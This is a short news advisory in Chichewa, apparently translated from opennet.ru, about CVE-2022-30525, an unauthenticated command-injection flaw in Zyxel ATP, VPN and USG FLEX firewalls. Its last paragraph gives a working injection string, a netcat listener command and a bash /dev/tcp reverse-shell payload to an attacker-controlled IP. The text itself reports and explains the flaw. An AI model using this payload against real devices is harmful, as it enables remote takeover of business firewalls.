Chiwopsezo chachikulu (CVE-2022-30525) chadziwika pazida za Zyxel za ATP, VPN ndi USG FLEX mndandanda, wopangidwira kukonza magwiridwe antchito a ma firewall, IDS ndi VPN m'mabizinesi, zomwe zimalola wowukira kunja kuti apereke code pa chipangizo popanda ufulu wogwiritsa ntchito popanda kutsimikizika. Kuti achite chiwembu, wowukirayo ayenera kutumiza zopempha ku chipangizocho pogwiritsa ntchito protocol ya HTTP/HTTPS. Zyxel yakhazikitsa chiwopsezo pakusintha kwa firmware ya ZLD 5.30. Malinga ndi ntchito ya Shodan, pakadali pano pali zida 16213 zomwe zitha kukhala pachiwopsezo pa intaneti yapadziko lonse lapansi zomwe zimavomereza zopempha kudzera pa HTTP/HTTPS.
Ntchitoyi imachitika potumiza malamulo opangidwa mwapadera kwa wogwiritsa ntchito intaneti /ztp/cgi-bin/handler, opezeka popanda kutsimikizika. Vutoli limayamba chifukwa chosowa kuyeretsa koyenera kwa magawo opempha pochita malamulo padongosolo pogwiritsa ntchito foni ya os.system yomwe imagwiritsidwa ntchito mu library ya lib_wan_settings.py ndikuchitidwa pokonza ntchito ya setWanPortSt.
Mwachitsanzo, wowukira akhoza kudutsa chingwe β; pa 192.168.1.210;" zomwe zidzatsogolera ku kuchitidwa kwa lamulo la "ping 192.168.1.210" pa dongosolo. Kuti mupeze chipolopolo cha lamulo, mutha kuthamanga "nc -lvnp 1270" pakompyuta yanu, ndiyeno yambitsani kulumikizana kobwereranso potumiza pempho ku chipangizocho ndi '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
Source: opennet.ru